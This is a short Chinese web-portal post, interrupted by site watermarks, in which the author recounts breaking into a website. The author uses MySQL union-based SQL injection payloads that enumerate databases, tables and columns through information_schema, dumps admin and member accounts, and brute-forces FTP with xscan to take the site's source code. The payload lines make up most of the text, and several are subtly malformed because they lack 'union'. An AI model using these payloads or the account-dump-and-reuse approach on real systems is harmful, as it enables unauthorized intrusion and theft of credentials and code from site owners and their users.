| 网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 |
|
| Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道 |
找注射点,判断字段数就不提了。
判断下权限,非root连,没有load_file()的权限,不能select into outfile,幸好mysql版本是5.
网管网www.bitscn.com
获取库名 网管网www_bitscn_com
and 1=2 union select 1,2,3,database(),5....,87/*
或者 网管论坛bbs_bitsCN_com
and 1=2 select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1/*
and 1=2 select SCHEMA_NAME from information_schema.SCHEMATA limit 1,1/* 中国网管联盟bitsCN.com
----------------------------------------------------------------------------------------------
获取表名:
网管u家u.bitsCN.com
数据库名转换成hex:admin=0x61646D696E
and 1=2 select TABLE_NAME from information_schema.TABLES%20where%20TABLE_SCHEMA=0x61646D696E%20limit 0,1/*
网管联盟bitsCN@com
。。。依次往下爆
------------------------------------------------------------------------------------------------
获取字段值:
表 admin=0x61646D696E
and 1=2 select COLUMN_NAME from information_schema.COLUMNS%20where%20TABLE_NAME=0x61646D696E%20limit 0,1/* 网管联盟bitsCN@com
---------------------------------------------------------------------------------------------------
网管u家u.bitsCN.com
爆出管理员帐号后,发现登录不了后台。于是又爆了10套member帐号。整理了下帐号和口令,扔xscan跑ftp口令,2分钟后拿到ftp权限。只是要源代码,到此收工。没技术含量! 中国网管论坛bbs.bitsCN.com
|
0
|
评论加载中…
